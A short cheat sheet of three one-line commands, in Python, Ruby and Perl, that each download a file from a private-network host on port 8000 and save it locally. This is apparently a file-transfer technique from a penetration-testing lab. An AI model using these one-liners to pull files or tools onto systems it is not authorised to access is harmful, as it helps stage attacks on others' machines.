python3 -c 'import urllib.request;urllib.request.urlretrieve("http://10.10.15.2:8000/try.txt", "try.txt")'
ruby -e 'require "net/http"; File.write("try2.txt", Net::HTTP.get(URI.parse("http://10.10.15.2:8000/try.txt")))'
perl -e 'use LWP::Simple; getstore("http://10.10.15.2:8000/try.txt", "try3.txt");'